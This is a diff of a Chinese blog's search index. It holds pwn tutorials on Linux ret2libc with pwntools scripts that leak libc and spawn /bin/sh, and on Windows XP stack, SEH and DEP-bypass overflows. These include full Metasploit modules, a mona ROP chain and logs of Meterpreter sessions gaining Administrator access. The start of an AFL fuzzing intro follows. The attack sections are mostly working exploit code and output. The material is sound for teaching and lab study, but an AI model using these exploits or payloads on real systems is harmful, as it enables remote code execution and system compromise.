寻找跳板这时候我们可以使用gdb进行调试。然后通过print和find命令来查找system和”/bin/sh”字符串的地址。我们首先在main函数上下一个断点，然后执行程序，这样的话程序会加载libc.so到内存中，然后我们就可以通过”print system”这个命令来获取system函数在内存中的位置，随后我们可以通过” print __libc_start_main”这个命令来获取libc.so在内存中的起始位置，接下来我们可以通过find命令来查找”/bin/sh”这个字符串。这样我们就得到了system的地址0xf7e19d10以及”/bin/sh”的地址0xf7f588cf。1234567891011121314151617Breakpoint 1, main () at ret2libcGOT.c:2020 ret2libcGOT.c: No such file or directory.gdb-peda$ print system$1 = &#123;&lt;text variable, no debug info&gt;&#125; 0xf7e19d10 &lt;system&gt;gdb-peda$ print __libc_start_main$2 = &#123;&lt;text variable, no debug info&gt;&#125; 0xf7df5d90 &lt;__libc_start_main&gt;gdb-peda$ find 0xf7df5d90,+2200000,&quot;/bin/sh&quot;Searching for &apos;0xf7df5d90,+2200000,/bin/sh&apos; in: None rangesSearch for a pattern in memory; support regex searchUsage: searchmem pattern start end searchmem pattern mapnamegdb-peda$ find &quot;/bin/sh&quot;Searching for &apos;/bin/sh&apos; in: None rangesFound 1 results, display max 1 items:libc : 0xf7f588cf (&quot;/bin/sh&quot;) 测试123456789101112from pwn import *p = process(&apos;./ret2libc3&apos;)offset = 112system_addr = 0xf7e19d10binsh = 0xf7f588cfpayload = flat([&apos;a&apos;*112,system_addr,0xdeabeef,binsh])p.sendline(payload)p.interactive() 4. 两个都没有&amp;有ASLR通过sudo cat /proc/[pid]/maps或者ldd查看，你会发现libc.so地址每次都是变化的12345678910$ ldd ret2libc3 linux-gate.so.1 (0xf7f43000) libc.so.6 =&gt; /lib32/libc.so.6 (0xf7d4c000) /lib/ld-linux.so.2 (0xf7f45000)han at ubuntu in ~/ck/pwn/linux/ret2libc$ ldd ret2libc3 linux-gate.so.1 (0xf7f96000) libc.so.6 =&gt; /lib32/libc.so.6 (0xf7d9f000) /lib/ld-linux.so.2 (0xf7f98000) 那么如何解决地址随机化的问题呢？思路是：我们需要先泄漏出libc.so某些函数在内存中的地址，然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/sh字符串在内存中的地址，然后再执行我们的ret2libc的shellcode。既然栈，libc，heap的地址都是随机的。我们怎么才能泄露出libc.so的地址呢？方法还是有的，因为程序本身在内存中的地址并不是随机的，如图所示： 也就是说程序内存映像是没有随机的 首先我们利用objdump来查看可以利用的plt函数和函数对应的got表：1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283$ objdump -d -j .plt ./ret2libc3./ret2libc3: file format elf32-i386Disassembly of section .plt:08048420 &lt;.plt&gt;: 8048420: ff 35 04 a0 04 08 pushl 0x804a004 8048426: ff 25 08 a0 04 08 jmp *0x804a008 804842c: 00 00 add %al,(%eax) ...08048430 &lt;printf@plt&gt;: 8048430: ff 25 0c a0 04 08 jmp *0x804a00c 8048436: 68 00 00 00 00 push $0x0 804843b: e9 e0 ff ff ff jmp 8048420 &lt;.plt&gt;08048440 &lt;gets@plt&gt;: 8048440: ff 25 10 a0 04 08 jmp *0x804a010 8048446: 68 08 00 00 00 push $0x8 804844b: e9 d0 ff ff ff jmp 8048420 &lt;.plt&gt;08048450 &lt;time@plt&gt;: 8048450: ff 25 14 a0 04 08 jmp *0x804a014 8048456: 68 10 00 00 00 push $0x10 804845b: e9 c0 ff ff ff jmp 8048420 &lt;.plt&gt;08048460 &lt;puts@plt&gt;: 8048460: ff 25 18 a0 04 08 jmp *0x804a018 8048466: 68 18 00 00 00 push $0x18 804846b: e9 b0 ff ff ff jmp 8048420 &lt;.plt&gt;08048470 &lt;__gmon_start__@plt&gt;: 8048470: ff 25 1c a0 04 08 jmp *0x804a01c 8048476: 68 20 00 00 00 push $0x20 804847b: e9 a0 ff ff ff jmp 8048420 &lt;.plt&gt;08048480 &lt;srand@plt&gt;: 8048480: ff 25 20 a0 04 08 jmp *0x804a020 8048486: 68 28 00 00 00 push $0x28 804848b: e9 90 ff ff ff jmp 8048420 &lt;.plt&gt;08048490 &lt;__libc_start_main@plt&gt;: 8048490: ff 25 24 a0 04 08 jmp *0x804a024 8048496: 68 30 00 00 00 push $0x30 804849b: e9 80 ff ff ff jmp 8048420 &lt;.plt&gt;080484a0 &lt;setvbuf@plt&gt;: 80484a0: ff 25 28 a0 04 08 jmp *0x804a028 80484a6: 68 38 00 00 00 push $0x38 80484ab: e9 70 ff ff ff jmp 8048420 &lt;.plt&gt;080484b0 &lt;rand@plt&gt;: 80484b0: ff 25 2c a0 04 08 jmp *0x804a02c 80484b6: 68 40 00 00 00 push $0x40 80484bb: e9 60 ff ff ff jmp 8048420 &lt;.plt&gt;080484c0 &lt;__isoc99_scanf@plt&gt;: 80484c0: ff 25 30 a0 04 08 jmp *0x804a030 80484c6: 68 48 00 00 00 push $0x48 80484cb: e9 50 ff ff ff jmp 8048420 &lt;.plt&gt;$ objdump -R ret2libc3ret2libc3: file format elf32-i386DYNAMIC RELOCATION RECORDSOFFSET TYPE VALUE08049ffc R_386_GLOB_DAT __gmon_start__0804a040 R_386_COPY stdin@@GLIBC_2.00804a060 R_386_COPY stdout@@GLIBC_2.00804a00c R_386_JUMP_SLOT printf@GLIBC_2.00804a010 R_386_JUMP_SLOT gets@GLIBC_2.00804a014 R_386_JUMP_SLOT time@GLIBC_2.00804a018 R_386_JUMP_SLOT puts@GLIBC_2.00804a01c R_386_JUMP_SLOT __gmon_start__0804a020 R_386_JUMP_SLOT srand@GLIBC_2.00804a024 R_386_JUMP_SLOT __libc_start_main@GLIBC_2.00804a028 R_386_JUMP_SLOT setvbuf@GLIBC_2.00804a02c R_386_JUMP_SLOT rand@GLIBC_2.00804a030 R_386_JUMP_SLOT __isoc99_scanf@GLIBC_2.7 思路：通过puts@plt打印出libc_start_main在内存中的地址，也就是libc_start_main@got。既然puts()函数实现是在libc.so当中，那我们调用的puts@plt()函数为什么也能实现puts()功能呢? 这是因为linux采用了延时绑定技术，当我们调用puts@plt()的时候，系统会将真正的puts()函数地址link到got表的puts.got中，然后puts@plt()会根据puts.got 跳转到真正的puts()函数上去。由于 libc 的延迟绑定机制，我们需要泄漏已经执行过的函数的地址。这里我们泄露 libc_start_main 的地址，这是因为它是程序最初被执行的地方。 使用ldd命令可以查看目标程序调用的so库。随后我们把libc.so拷贝到当前目录，因为我们的exp需要这个so文件来计算相对地址：1234567$ ldd ret2libc3 linux-gate.so.1 (0xf7f6b000) libc.so.6 =&gt; /lib32/libc.so.6 (0xf7d74000) /lib/ld-linux.so.2 (0xf7f6d000)han at ubuntu in ~/ck/pwn/linux/ret2libc$ cp /lib32/libc.so.6 libc.so pwn测试12345678910111213141516171819202122232425262728293031from pwn import *from LibcSearcher import LibcSearcherp = process(&apos;./ret2libc3&apos;)elf = ELF(&apos;./ret2libc3&apos;)libc = ELF(&apos;./libc.so&apos;)puts_plt = elf.plt[&apos;puts&apos;]libc_start_main_got =elf.got[&apos;__libc_start_main&apos;]main = elf.symbols[&apos;main&apos;]print(&quot;leak libc_start_main_got addr and return to main again&quot;)payload = flat([&apos;a&apos;*112],puts_plt,main,libc_start_main_got)p.sendlineafter(&apos;Can you find it !?&apos;,payload)print(&quot;receiving libc_start_main_got&quot;)libc_start_main_addr = u32(p.recv(4))print(&apos;libc_start_main_addr = &apos; + hex(libc_start_main_addr))print(&quot;calculating system() addr and \&quot;/bin/sh\&quot; addr&quot;)system_addr = libc_start_main_addr + (libc.symbols[&apos;system&apos;]-libc.symbols[&apos;__libc_start_main&apos;])print(&apos;system_addr= &apos; + hex(system_addr))binsh_addr = libc_start_main_addr + (next(libc.search(&apos;/bin/sh&apos;))-libc.symbols[&apos;__libc_start_main&apos;])print(&apos;binsh_addr= &apos; + hex(binsh_addr))print(&quot;get shell&quot;)print(p32(system_addr),p32(binsh_addr))payload = flat([&apos;a&apos;*104,system_addr,0xdeadbeef,binsh_addr])p.sendline(payload)p.interactive() ELF模块ELF模块用于获取ELF文件的信息，首先使用ELF()获取这个文件的句柄，然后使用这个句柄调用函数，和IO模块很相似。下面演示了：获取基地址、获取函数地址（基于符号）、获取函数got地址、获取函数plt地址12345678910&gt; &gt;&gt;&gt; e = ELF(&apos;/bin/cat&apos;)&gt; &gt;&gt;&gt; print hex(e.address) # 文件装载的基地址&gt; 0x400000&gt; &gt;&gt;&gt; print hex(e.symbols[&apos;write&apos;]) # 函数地址&gt; 0x401680&gt; &gt;&gt;&gt; print hex(e.got[&apos;write&apos;]) # GOT表的地址&gt; 0x60b070&gt; &gt;&gt;&gt; print hex(e.plt[&apos;write&apos;]) # PLT的地址&gt; 0x401680&gt; 如果无法直接知道对方所使用的操作系统及libc的版本而苦恼，常规方法就是挨个把常见的Libc.so从系统里拿出来，与泄露的地址对比一下最后12位，从而获取版本github上面有个库可以参考：https://github.com/lieanu/LibcSearcher12345678from LibcSearcher import *#第二个参数，为已泄露的实际地址,或最后12位(比如：d90)，int类型obj = LibcSearcher(&quot;fgets&quot;, 0X7ff39014bd90)obj.dump(&quot;system&quot;) #system 偏移obj.dump(&quot;str_bin_sh&quot;) #/bin/sh 偏移obj.dump(&quot;__libc_start_main_ret&quot;) 0x05 Memory Leak &amp; DynELF - 在不获取目标libc.so的情况下进行ROP攻击参考的是蒸米的exp，但是用的不是他的示例程序，而是ret2libc3。他的方法是通过write@plt泄露内存，然后寻找system函数。然后使用read@plt将’/bin/sh’写入.bss段，然后通过pppr移交控制权给system()ret2libc3的不同之处在于，没有write和read，不过没有关系，使用puts@plt和gets@plt也可以实现嘛，但是难就难在，虽然puts@plt只有一个参数，但是它有着遇到’\x00’就截断并在后面填充’\n’的“好”习惯，所以泄露出来的数据还需要处理。可以参考下面这两篇：https://www.anquanke.com/post/id/85129http://uprprc.club/2016/09/07/pwntools-dynelf.html 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455from pwn import *p = process('./ret2libc3')elf = ELF('./ret2libc3')plt_puts = elf.symbols['puts']main = elf.symbols['main']plt_gets = elf.symbols['gets']start_addr = elf.symbols['_start']def leak(address): global i count = 0 content = '' x = p.recvuntil('!?') payload1 = '\x90'*112 + p32(plt_puts) + p32(main) + p32(address) p.sendline(payload1) up = "" while True: c = p.recv(1) count += 1 if up == '\n' and c == 'N': print((content).encode('hex')) content =content[:-1]+'\x00' break else: content += c up = c content = content[:4] # content = p.recvuntil('\nN',True) # print(content) # if not content: # content = '\x00' # else: # content = content[:4] print("%#x =&gt; %s" %(address, (content or '').encode('hex'))) return contentd = DynELF(leak,elf = ELF('./ret2libc3'))system_addr = d.lookup('system','libc')print("system address = " + hex(system_addr))bss_addr = 0x0804a040pr = 0x0804841dpayload2 = flat(['a'*112,plt_gets,pr,bss_addr,sytem_addr,main,bss_addr])print("###sending payload2####")p.sendline(payload2)p.sendline("/bin/sh\0")p.interactive() 这段代码在泄露第一个数据之后就失败了，我调试了好久，最后才想起来，payload1 = &#39;\x90&#39;*112 + p32(plt_puts) + p32(main) + p32(address)这里如果使用的是main，那么堆栈就会不平衡，导致溢出点变化（参见之前从112变成104）。但是如果改成返回到start_addr，泄露的数据就会更多（虽然还是没有成功）。一个事实是汇编程序的入口是_start，而C程序的入口是main函数 执行的流程是：GCC将你的程序同crtbegin.o/crtend.o/gcrt1.o一块进行编译。其它默认libraries会被默认动态链接。可执行程序的开始地址被设置为_start。内核加载可执行文件，并且建立正文段，数据段，bss段和堆栈段，特别的，内核为参数和环境变量分配页面，并且将所有必要信息push到堆栈上。控制流程到了_start上面。_start从内核建立的堆栈上获取所有信息，为libc_start_main建立参数栈，并且调用libc_start_main。libc_start_main初始化一些必要的东西，特别是C library（比如malloc)线程环境并且调用我们的main函数。我们的main会以main(argv,argv)来被调用。事实上，这里有意思的一点是main函数的签名。libc_start_main认为main的签名为main(int, char , char )，如果你感到好奇，尝试执行下面的程序。https://www.mi1k7ea.com/2019/03/05/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2libc/]]></content>
       <categories>
-        <category>Pwn二进制漏洞</category>
+        <category>Pwn</category>
       </categories>
       <tags>
         <tag>linux</tag>
@@ -55,7 +55,7 @@
     <url>%2F2019%2F07%2F10%2Fx86basic%2F</url>
     <content type="text"><![CDATA[这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。 0x00 漏洞利用开发简介（1）需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3 函数调用与栈：调用、返回 寄存器与函数栈帧：ESP、EBP 函数栈帧：局部变量、栈帧状态值、函数返回地址 函数调用约定与相关指令：参数传递方式、参数入栈顺序、恢复堆栈平衡的操作 （2）函数调用的汇编过程 示例程序 123456charname[] = "1234567";voidfunc(int a, int b, int c)&#123; charbuf[8]; strcpy(buf, name);&#125; 汇编过程 PUSH c, PUSH b, PUSH a CALL address of func【保存返回地址；跳转】 MOV ebp, esp PUSH ebp SUB esp, 0x40 创建局部变量，4个字节为一组 do something add esp, 0x40 pop ebp RETN【弹出返回地址，跳转】 栈帧结构 0x01 简单栈溢出 目标程序:bof-server source codebof-server binary for Windowsusage:服务端bof-server.exe 4242客户端telnet localhost 4242versionbof-server v0.01quit 漏洞点 产生崩溃将输出的1024个A发送给靶机程序12python -c &quot;print(&apos;A&apos; * 1024)&quot;telnet 192.168.64.138 4242 关闭防御措施使用PESecurity检查可执行文件本身的防御措施开启情况注意设置：Set-ExecutionPolicyUnrestricted ASLR和DEPASLR在xp下不用考虑，DEP可通过修改boot.ini中的nonexecute来完成（AlwaysOff、OptOut） 整体的攻击流程 任意非00的指令覆盖buffer和EBP 从程序已经加载的dll中获取他们的jmp esp指令地址。 使用jmp esp的指令地址覆盖ReturnAddress 从下一行开始填充Shellcode 确定溢出点的位置 生成字符序列 pattern_create.rb 发送给目标程序 计算偏移量 pattern_offset.rb 确定payload结构 寻找jmp esp跳板 OD附加进程看一下服务器加载了哪些模块 查找JMP ESP指令的地址在这里选择了ws2_32.dll作为对象，通过Metasploit的msfbinscan进行搜索 自动化攻击123456789101112131415161718192021222324252627282930313233343536373839require 'msf/core'class Metasploit3 &lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = &#123;&#125;) super(update_info(info, 'Name' =&gt; 'Stack Based Buffer Overflow Example', 'Description' =&gt; %q&#123; Stack Based Overflow Example Application Exploitation Module &#125;, 'Platform' =&gt; 'Windows', 'Author' =&gt; 'yanhan', 'Payload' =&gt; &#123; 'space' =&gt; 400, 'BadChars' =&gt; "\x00\xff" &#125;, 'Targets' =&gt; [ [ 'Windows XP SP3', &#123;'Ret' =&gt; 0x71a22b53, 'Offset' =&gt; 520&#125; ] ], 'DisclosureDate' =&gt; '2019-05-25' )) end def exploit connect buf = make_nops(target['Offset']) buf = buf + [target['Ret']].pack('V') + make_nops(20) + payload.encoded sock.put(buf) handler disconnect endend 123456789101112131415161718192021222324252627282930313233343536msf5 &gt; use exploit/windows/yanhan/bof_attackmsf5 exploit(windows/yanhan/bof_attack) &gt; set rhosts 192.168.31.114rhosts =&gt; 192.168.31.114msf5 exploit(windows/yanhan/bof_attack) &gt; set rport 1000rport =&gt; 1000msf5 exploit(windows/yanhan/bof_attack) &gt; exploit[*] Started reverse TCP handler on 192.168.31.84:4444[*] Sending stage (179779 bytes) to 192.168.31.114[*] Meterpreter session 1 opened (192.168.31.84:4444 -&gt; 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800meterpreter &gt; lsListing: C:\Documents and Settings\Administrator================================================Mode Size Type Last modified Name---- ---- ---- ------------- ----40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Application Data40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Cookies40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Favorites40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Local Settings40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 My Documents100666/rw-rw-rw- 1048576 fil 2019-05-14 09:54:43 +0800 NTUSER.DAT40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 NetHood40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 PrintHood40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Recent40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 SendTo40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Templates100777/rwxrwxrwx 26665 fil 2019-05-28 14:59:10 +0800 bof-server.exe100666/rw-rw-rw- 1024 fil 2019-05-14 09:54:43 +0800 ntuser.dat.LOG100666/rw-rw-rw- 178 fil 2019-05-14 09:54:43 +0800 ntuser.ini40777/rwxrwxrwx 0 dir 2019-05-29 10:49:26 +0800 vulnserver40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 「开始」菜单40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 桌面meterpreter &gt; 0x02 基于SEH的栈溢出 目标程序 Easy File Sharing Web Server 7.2 漏洞点在处理请求时存在漏洞——一个恶意的请求头部（HEAD或GET）就可以引起缓冲区溢出，从而改写SEH链的地址。 利用seh填充物+nseh+ seh（pop popretn指令序列地址）+shellcode 确定溢出点的位置 生成字符序列123/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 &gt; a.txtpython -c &quot;print(&apos; HTTP/1.0\r\n\r\n&apos;)&quot; &gt; b.txtcat a.txt b.txt &gt; c.txt 删除cat造成的多余字符0x0a12345vim -bz.txt# In Vim:%!xxd# After editing, use the instruction below to save:%!xxd -r 构造SEH链 将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中，并处于运行状态。 发送溢出字符序列 查看Easy File Sharing Web Server 7.2溢出地址 计算偏移量计算catch块偏移量&amp;计算下一条SEH记录偏移量 寻找PPR 使用mona寻找需要POP/POP/RET指令的地址来载入下一条SEH记录的地址，并跳转到攻击载荷12!mona modules!mona seh 自动化攻击 编写攻击脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647require 'msf/core'class MetasploitModule &lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = &#123;&#125;) super(update_info(info, 'Name' =&gt; 'Easy File Sharing HTTP Server 7.2 SEH Overflow', 'Description' =&gt; %q&#123; This Module Demonstrate SEH based overflow example &#125;, 'Author' =&gt; 'yanhan', 'Payload' =&gt; &#123; 'Space' =&gt; 390, 'BadChars' =&gt; "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e" &#125;, 'Platform' =&gt; 'Windows', 'Targets' =&gt; [ [ 'Easy File Sharing 7.2 HTTP', &#123; 'Ret' =&gt; 0x10022fd7, 'Offset' =&gt; 4061 &#125; ] ], 'DisclosureDate' =&gt; '2019-01-16', )) end def exploit connect weapon = "HEAD " weapon &lt;&lt; make_nops(target['Offset']) weapon &lt;&lt; generate_seh_record(target['Ret']) weapon &lt;&lt; make_nops(20) weapon &lt;&lt; payload.encoded weapon &lt;&lt; " HTTP/1.0\r\n\r\n" sock.put(weapon) handler disconnect endend exploit 12345678910111213141516171819msf5 &gt; use exploit/windows/yanhan/seh_attackmsf5 exploit(windows/yanhan/seh_attack) &gt; set rhosts 192.168.31.114rhosts =&gt; 192.168.31.114msf5 exploit(windows/yanhan/seh_attack) &gt; set rport 80rport =&gt; 80msf5 exploit(windows/yanhan/seh_attack) &gt; exploit[*] Started reverse TCP handler on 192.168.31.84:4444[*] Exploit completed, but no session was created.msf5 exploit(windows/yanhan/seh_attack) &gt; set payload windows/meterpreter/bind_tcppayload =&gt; windows/meterpreter/bind_tcpmsf5 exploit(windows/yanhan/seh_attack) &gt; exploit[*] Started bind TCP handler against 192.168.31.114:4444[*] Sending stage (179779 bytes) to 192.168.31.114[*] Meterpreter session 1 opened (192.168.31.84:46601 -&gt; 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800meterpreter &gt; getuidServer username: WHU-3E3EECEBFD1\Administrator 0x03 绕过DEP 目标程序 Introducing Vulnserver使用 vulnserver.exe 6666漏洞点 设置DEP保护构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode 计算偏移量&#39;TRUN .&#39;+make_nops(target[&#39;Offset&#39;])Immunity附加进程之后，在服务端发送3000个字符，计算偏移 创建ROP链!mona rop -m *.dll -cp nonull12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667################################################################################Register setup for VirtualProtect() :-------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) --- alternative chain --- EAX = ptr to &amp;VirtualProtect() ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = POP (skip 4 bytes) ESI = ptr to JMP [EAX] EDI = ROP NOP (RETN) + place ptr to "jmp esp" on stack, below PUSHAD--------------------------------------------ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :----------------------------------------------------------*** [ Ruby ] *** def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x77dabf34, # POP ECX # RETN [ADVAPI32.dll] 0x6250609c, # ptr to &amp;VirtualProtect() [IAT essfunc.dll] 0x77d1927f, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c96d192, # XCHG EAX,ESI # RETN [ntdll.dll] 0x77bef671, # POP EBP # RETN [msvcrt.dll] 0x625011af, # &amp; jmp esp [essfunc.dll] 0x77e9ad22, # POP EAX # RETN [RPCRT4.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x77e6c784, # NEG EAX # RETN [RPCRT4.dll] 0x77dc560a, # XCHG EAX,EBX # RETN [ADVAPI32.dll] 0x7c87fbcb, # POP EAX # RETN [kernel32.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x77d4493b, # NEG EAX # RETN [USER32.dll] 0x77c28fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77bef7c9, # POP ECX # RETN [msvcrt.dll] 0x7c99bac1, # &amp;Writable location [ntdll.dll] 0x719e4870, # POP EDI # RETN [mswsock.dll] 0x77e6d224, # RETN (ROP NOP) [RPCRT4.dll] 0x77e8c50c, # POP EAX # RETN [RPCRT4.dll] 0x90909090, # nop 0x77de60c7, # PUSHAD # RETN [ADVAPI32.dll] ].flatten.pack("V*") return rop_gadgets end # Call the ROP chain generator inside the 'exploit' function : rop_chain = create_rop_chain() 自动化攻击12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970require 'msf/core'class Metasploit3 &lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = &#123;&#125;) super(update_info(info, 'Name' =&gt; 'DEP Bypass Exploit', 'Description' =&gt; %q&#123; DEP Bypass Using ROP Chains Example Module &#125;, 'Platform' =&gt; 'Windows', 'Author' =&gt; 'yanhan', 'Payload' =&gt; &#123; 'space' =&gt; 312, 'BadChars' =&gt; "\x00" &#125;, 'Targets' =&gt; [ [ 'Windows XP', &#123;'Offset' =&gt; find it&#125; ] ], 'DisclosureDate' =&gt; '2019-01-16')) end def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x77dabf34, # POP ECX # RETN [ADVAPI32.dll] 0x6250609c, # ptr to &amp;VirtualProtect() [IAT essfunc.dll] 0x77d1927f, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c96d192, # XCHG EAX,ESI # RETN [ntdll.dll] 0x77bef671, # POP EBP # RETN [msvcrt.dll] 0x625011af, # &amp; jmp esp [essfunc.dll] 0x77e9ad22, # POP EAX # RETN [RPCRT4.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x77e6c784, # NEG EAX # RETN [RPCRT4.dll] 0x77dc560a, # XCHG EAX,EBX # RETN [ADVAPI32.dll] 0x7c87fbcb, # POP EAX # RETN [kernel32.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x77d4493b, # NEG EAX # RETN [USER32.dll] 0x77c28fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77bef7c9, # POP ECX # RETN [msvcrt.dll] 0x7c99bac1, # &amp;Writable location [ntdll.dll] 0x719e4870, # POP EDI # RETN [mswsock.dll] 0x77e6d224, # RETN (ROP NOP) [RPCRT4.dll] 0x77e8c50c, # POP EAX # RETN [RPCRT4.dll] 0x90909090, # nop 0x77de60c7, # PUSHAD # RETN [ADVAPI32.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect rop_chain = create_rop_chain() junk = make_nops(target['Offset']) buf = "TRUN ." + junk + rop_chain + make_nops(16) + payload.encoded + '\r\n' sock.put(buf) handler disconnect endend 1234567891011121314151617181920212223msf5 &gt; use exploit/windows/yanhan/rop_attackmsf5 exploit(windows/yanhan/rop_attack) &gt; set rhosts 192.168.31.114rhosts =&gt; 192.168.31.114msf5 exploit(windows/yanhan/rop_attack) &gt; set rport 1000rport =&gt; 1000msf5 exploit(windows/yanhan/rop_attack) &gt; exploit[*] Started reverse TCP handler on 192.168.31.84:4444[*] Exploit completed, but no session was created.msf5 exploit(windows/yanhan/rop_attack) &gt; set payload windows/meterpreter/bind_tcppayload =&gt; windows/meterpreter/bind_tcpmsf5 exploit(windows/yanhan/rop_attack) &gt; exploit[*] Started bind TCP handler against 192.168.31.114:4444[*] Exploit completed, but no session was created.msf5 exploit(windows/yanhan/rop_attack) &gt; exploit[*] Started bind TCP handler against 192.168.31.114:4444[*] Sending stage (179779 bytes) to 192.168.31.114[*] Meterpreter session 1 opened (192.168.31.84:44537 -&gt; 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800meterpreter &gt; getuidServer username: WHU-3E3EECEBFD1\Administrator]]></content>
       <categories>
-        <category>Pwn二进制漏洞</category>
+        <category>Pwn</category>
       </categories>
       <tags>
         <tag>二进制</tag>
@@ -78,7 +78,7 @@
   <entry>
     <title><![CDATA[模糊测试与AFL]]></title>
     <url>%2F2019%2F07%2F01%2FAFL-first-learn%2F</url>
-    <content type="text"><![CDATA[接触这个词语已经有一年了，但还没有学习过更没有上手实践过，正好趁这个机会好好弄弄AFL。提起模糊测试，我们总会联想起这样或那样的专业术语——测试用例、代码覆盖率、执行路径等等，你可能和我一样一头雾水，这次我们就来看个明白 0x01 模糊测试首先，模糊测试（Fuzzing）是一种测试手段，它把系统看成一个摸不清内部结构的黑盒，只是向其输入接口随机地发送合法测试用例，这些用例并不是开发者所预期的输入，所以极有可能会造成系统的崩溃，通过分析崩溃信息，测试人员（黑客）就可以评估系统是否存在可利用的漏洞。模糊测试的过程，就好像是一个不断探测系统可以承受的输入极限的过程，让我想起学电子的时候对一个滤波器进行带宽的评估，如果我们知道内部电路原理，那么这个器件对于我们就是白盒了，可以直接通过公式计算理论带宽，现在系统对于我们而言是一个黑盒，我们通过在足够大频率范围内对其不断输入信号，就能测试出其实际带宽。 模糊测试方法一览 基于变种的Fuzzer 基于模板的Fuzzer 基于反馈演进的Fuzzer 基于追踪路径覆盖率 基于分支覆盖率 在已知合法的输入的基础上，对该输入进行随机变种或者依据某种经验性的变种，从而产生不可预期的测试输入。 此类Fuzzer工具的输入数据，依赖于安全人员结合自己的知识，给出输入数据的模板，构造丰富的输入测试数据。 此类Fuzzer会实时的记录当前对于目标程序测试的覆盖程度，从而调整自己的fuzzing输入。 PAP:路径编码的算法;后面会产生路径爆炸的问题 漏洞的爆发往往由于触发了非预期的分支 Taof, GPF, ProxyFuzz, Peach Fuzzer SPIKE, Sulley, Mu‐4000, Codenomicon AFL 0x02 AFL快速入门1）用make编译AFL。如果构建失败，请参阅docs / INSTALL以获取提示。2）查找或编写一个相当快速和简单的程序，该程序从文件或标准输入中获取数据，以一种有价值的方式处理它，然后干净地退出。如果测试网络服务，请将其修改为在前台运行并从stdin读取。在对使用校验和的格式进行模糊测试时，也要注释掉校验和验证码。遇到故障时，程序必须正常崩溃。注意自定义SIGSEGV或SIGABRT处理程序和后台进程。有关检测非崩溃缺陷的提示，请参阅docs/README中的第11节。3）使用afl-gcc编译要模糊的程序/库。一种常见的方法是：12$ CC = /path/to/afl-gcc CXX =/path/to/afl-g++ ./configure --disable-shared$ make clean all 如果程序构建失败，请联系 &#97;&#x66;&#108;&#x2d;&#117;&#x73;&#x65;&#x72;&#115;&#x40;&#103;&#111;&#x6f;&#103;&#x6c;&#x65;&#x67;&#x72;&#x6f;&#x75;&#112;&#115;&#46;&#x63;&#111;&#109;。4）获取一个对程序有意义的小而有效的输入文件。在模糊详细语法（SQL，HTTP等）时，也要创建字典，如dictionaries/README.dictionaries中所述。5）如果程序从stdin读取，则运行afl-fuzz，如下所示：./afl-fuzz -i testcase_dir -o findings_dir -- /path/to/tested/program [... program&#39;s cmdline ...] 如果程序从文件中获取输入，则可以在程序的命令行中输入@@; AFL会为您放置一个自动生成的文件名。 一些参考文档 docs/README - AFL的一般介绍，docs/perf_tips.txt - 关于如何快速模糊的简单提示，docs/status_screen.txt - UI中显示的花絮的解释，docs/parallel_fuzzing.txt - 关于在多个核上运行AFL的建议Generated test cases for common image formats - 生成图像文件测试用例的demoTechnical “whitepaper” for afl-fuzz - 技术白皮书 适用环境该工具已确认适用于32位和64位的x86 Linux，OpenBSD，FreeBSD和NetBSD。 它也适用于MacOS X和Solaris，但有一些限制。 它支持用C，C ++或Objective C编写的程序，使用gcc或clang编译。 